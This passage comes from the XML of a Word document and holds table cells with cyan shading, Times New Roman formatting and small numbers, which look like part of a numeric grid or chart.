              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>31</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FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>32</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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>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00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="200" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>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30</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20</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24</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12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19</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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>16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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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12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200" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>12</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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>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18</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w:t>
            </w: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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>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FFFF"/>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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>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FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="200" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="8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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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38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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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14</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15</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18</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23</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16</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32</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10</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380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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30</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20</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24</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12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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="6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6</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30</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22</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30</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10</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highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>21</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21</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gridSpan w:val="6"/>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w w:val="79"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>28</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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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26</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13</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10</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20</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18</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16</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31</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18</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highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>10</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300" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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7</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11"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="14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FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="160"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>
            <w:gridSpan w:val="7"/>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33</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sz w:val="18"/>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8"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="20"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="10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FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="100"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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30</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sz w:val="18"/>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8"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="247"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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14</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>32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360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>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FF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14</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12</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13</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11</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16</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21</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20</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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="260"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>4</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33</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60" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
